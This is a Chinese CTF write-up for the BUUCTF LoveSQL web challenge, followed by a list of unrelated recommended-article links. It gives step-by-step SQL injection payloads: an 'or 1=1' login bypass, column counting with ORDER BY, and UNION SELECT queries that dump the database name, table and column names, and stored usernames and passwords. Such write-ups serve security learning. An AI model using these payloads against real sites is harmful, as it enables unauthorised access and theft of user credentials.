buuctf web [极客大挑战 2019]LoveSQL

又是这样的界面,这糟糕的熟悉感,依旧使用上题套路

复制代码
用户名:
admin' or 1=1#
密码:
1

有一串很像flag的字符,但是很可惜,这不是flag

看了一眼源代码,没有可以跳转的页面

要换个思路了,重新查看题目,发现输入的东西在check.php页面有回显,并且url上也有显示,所以尝试sql注入

1、查看字段数
php 复制代码
/check.php?username=admin'order by 1%23&password=1
/check.php?username=admin'order by 2%23&password=1
/check.php?username=admin'order by 3%23&password=1
/check.php?username=admin'order by 4%23&password=1
##由于我们在url中输入,所以要把#换成url编码%23

字段为4报错,所以字段数是3

ps:补充(在url输入的时候要使url编码,具体要求看,你的输入有多少变成了url编码格式)

2、寻找回显字段

username=admin可能会影响系统的回显,所以把admin改成1

php 复制代码
/check.php?username=1'union select 1,2,3%23&password=1

可以看出,回显字段为2,3,所以我们把想要的信息,放在2,3的位置,让它显示在页面上

3、 爆破库与用户

php 复制代码
/check.php?username=1'union select 1,database(),user()%23&password=1

4、爆破表

复制代码
/check.php?username=1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

可以看到爆出来了两个表

5、爆l0ve1ysq1表

复制代码
/check.php?username=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

6、尝试爆l0ve1ysq1表里的3个数据

复制代码
/check.php?username=1'union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

flag显示不完整,打开源码就能看到完整的了

相关推荐
万法若空1 小时前
【算法-查找】查找算法
java·数据结构·算法
DianSan_ERP1 小时前
电商架构演进:如何在高并发场景下实现多平台API的标准化履约?
运维·前端·网络·安全·架构·自动化
殳翰1 小时前
下服务器端开发流程及相关工具介绍(C++)
开发语言·c++
落寞的星星2 小时前
这个对象就包含了已经转换好的DFA和各种词法分析器运转所需要的参数。下一步,我们就可以用ScannerInfo对象创建出Scanner对象,请看下面的代码:
开发语言·c#
nothing&nowhere2 小时前
用 Python 做问卷数据清洗:无效样本检测与处理实战
开发语言·python·数据清洗·数据处理·问卷星·问卷星脚本·刷问卷
2601_961593423 小时前
Rust 开发环境配置繁琐?RustRover 开箱即用搞定编码调试
开发语言·后端·macos·rust
HZZD_HZZD3 小时前
DL/T 645-2026新国标深度解读与智能电表协议适配实战:从帧结构变化到Java采集器升级的全链路改造方案
java·开发语言
碎_浪4 小时前
给键盘党的英语记忆工具:我做了一款「打字背单词」桌面应用
前端·程序员·ai编程
阿成学长_Cain5 小时前
Linux dirs命令详解|Bash目录堆栈管理快速切换目录实战教程
linux·运维·前端·数据库
多加点辣也没关系5 小时前
JavaScript|第4章:类型转换
开发语言·javascript